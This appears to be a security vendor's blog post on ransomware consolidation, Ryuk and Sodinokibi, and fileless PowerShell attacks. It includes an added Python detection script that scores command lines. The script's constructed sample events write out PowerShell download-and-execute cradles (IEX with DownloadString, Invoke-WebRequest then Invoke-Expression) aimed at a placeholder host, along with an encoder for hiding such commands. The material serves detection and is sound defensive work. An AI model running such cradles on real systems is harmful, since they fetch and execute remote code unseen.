Critical infrastructure attacks and sky-high ransoms are just the beginning.
Ransomware isn’t new, but the industrial complex behind today’s biggest attacks certainly is.
Only a few years ago, ransom demands from cybercriminal gangs were mostly four- or five-figure sums, but those early successes have encouraged today’s cybercriminals to demand millions of dollars, and to get paid.
Ransom amounts have increased along with the sophistication and scalability of today’s most popular ransomware variants. Cybercrime is a multi-billion dollar global industry, and it is growing tremendously year on year.
BlackFog collects and analyzes data from the ransomware industry, which allows us to stay ahead of trends and protect our customers against the latest threats. Some of the information we have gathered over the past few months indicates an alarming consolidation of cybercrime resources that will lead to new attacks making headlines in the months to come.
What does consolidated industrialized cybercrime look like?
Most of the data we analyzed throughout the year indicates significant consolidation efforts in the world of cybercrime. A handful of very active ransomware-as-a-service vendors dominate the landscape and provide infrastructure support to a loose confederation of hackers around the world.
These “ransomware gangs” function more like enterprise managed service providers. They hire specialist developers and group them into separate departments. They have dedicated accounting teams, territory-specific negotiators and executive officers.
These are not lone wolf operations, and they haven’t been for a long time.
In fact, the major cybercrime vendors consolidate their resources and analyze their performance to maximize results. More than half of all serialized ransomware attacks use software from two distinct families: Ryuk and Sodinokibi.
Ryuk is responsible for a large number of attacks on hospitals and other essential pieces of critical infrastructure. Ryuk-type ransomware was responsible for last year’s $67 million attack on Universal Health Services and the ensuing wave of attacks on U.S. healthcare operators.
Sodinokibi is the name of the ransomware used by REvil and is involved in many high-cost, high-profile attacks such as the one on Kaseya. It is increasingly used in double extortion attacks, where attackers demand one ransom to restore system functionality and another to avoid disclosing sensitive data to the public.
While these two ransomware families operate in totally different ways, they do share some key similarities. Both use PowerShell exploits to execute ransomware code entirely in memory and download payloads remotely – a completely fileless approach.
BlackFog research shows that 78% of all attacks now use PowerShell exploits, rendering file-based detection and prevention methods obsolete. PowerShell exploits do not produce an attack signature the way file-based ransomware does. More than eight in ten attacks threaten to exfiltrate data, making double extortion possible.
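Because a fileless PowerShell chain leaves no file to hash, the signal has to come from how PowerShell was invoked: process-creation command lines (Event ID 4688) and script block logging (Event ID 4104). The following is an added example, not BlackFog's tooling or anything from the original post. It scores constructed command lines against a handful of common fileless indicators (hidden window, encoded command, download cradle, in-memory execution) and decodes any -EncodedCommand payload so the indicators can also be matched against what would actually run. The indicator regexes, weights and thresholds are assumptions chosen for illustration; the sample events are made up.

```python
"""Score PowerShell command lines for fileless download-and-execute patterns.

Added example, not BlackFog code. The fields mimic what a SIEM receives from
Windows process-creation (4688) and PowerShell script block (4104) events.
"""
import base64
import re
from typing import Optional

# (indicator name, regex, assumed weight). Weights are illustrative, not tuned.
INDICATORS = [
    ("hidden_window",   re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    ("no_profile",      re.compile(r"-nop(?:rofile)?\b", re.I), 1),
    ("policy_bypass",   re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I), 2),
    ("encoded_command", re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), 2),
    ("download_cradle", re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer", re.I), 3),
    ("in_memory_exec",  re.compile(
        r"Invoke-Expression|\biex\b|\[Reflection\.Assembly\]|FromBase64String", re.I), 3),
]

# Captures the base64 argument of -EncodedCommand / -enc / -e.
ENCODED_ARG = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)


def encode_command(script: str) -> str:
    """Mirror PowerShell's -EncodedCommand format: base64 over UTF-16LE.
    Used here only to build constructed sample events."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the script hidden behind -EncodedCommand, or None if absent/invalid."""
    m = ENCODED_ARG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event: dict) -> dict:
    """Match indicators against the raw command line and its decoded payload."""
    text = event["command_line"]
    decoded = decode_encoded_command(text)
    haystack = text if decoded is None else text + "\n" + decoded
    hits = [name for name, rx, _ in INDICATORS if rx.search(haystack)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    # Assumed thresholds: two strong indicators together is what we care about.
    verdict = "suspicious" if score >= 5 else ("review" if score >= 2 else "benign")
    return {"event_id": event["id"], "hits": hits, "score": score,
            "decoded": decoded, "verdict": verdict}


# Constructed sample events (not real captures). The URL is a reserved
# placeholder domain, so none of these lines reach anything.
SAMPLE_EVENTS = [
    # Hidden window plus an encoded in-memory download cradle.
    {"id": 4688, "command_line":
        "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand "
        + encode_command("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')")},
    # Plaintext script block: fetch to temp, then evaluate the contents.
    {"id": 4104, "command_line":
        "Invoke-WebRequest -Uri http://example.invalid/x -OutFile $env:TEMP\\x.ps1; "
        "Invoke-Expression (Get-Content $env:TEMP\\x.ps1 -Raw)"},
    # Ordinary administration, should stay quiet.
    {"id": 4688, "command_line": "powershell.exe -NoProfile -Command Get-Service -Name Spooler"},
]


def run_samples() -> list:
    """Analyze the constructed events and return the results in order."""
    return [analyze_event(e) for e in SAMPLE_EVENTS]


if __name__ == "__main__":
    for r in run_samples():
        print(f"[{r['verdict']:>10}] event {r['event_id']} score={r['score']} hits={r['hits']}")
        if r["decoded"]:
            print("            decoded:", r["decoded"])
```

The point of decoding before matching is that an encoded command line shows none of the cradle keywords on its own; only the first indicator set (hidden window, encoded argument) fires on the raw string, while the decoded payload supplies the download and in-memory execution hits that push the score over the threshold. In production the same logic would sit on the SIEM's 4688/4104 feed, and the weights would be tuned against the environment's normal administrative PowerShell usage.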
Consolidation doesn’t mean predictability
It might be tempting to think that if large cybercrime organizations consolidate themselves, they might start using more predictable approaches. Unfortunately, the opposite is more likely. With greater resources, led by a more organized executive structure, cybercrime organizations will be able to provide more diverse and sophisticated ransomware services to their clients.
One of the most interesting developments of the past year supports this theory. The average ransom payment for the second quarter of 2021 is actually lower than in the previous quarter. At $135,576, the average ransom payment is 38% lower than it was just a few months ago.
The fundamentals of industrialized cybercrime have not changed significantly during this time, so it is unlikely that cybercriminals simply decided to be more modest in their financial goals.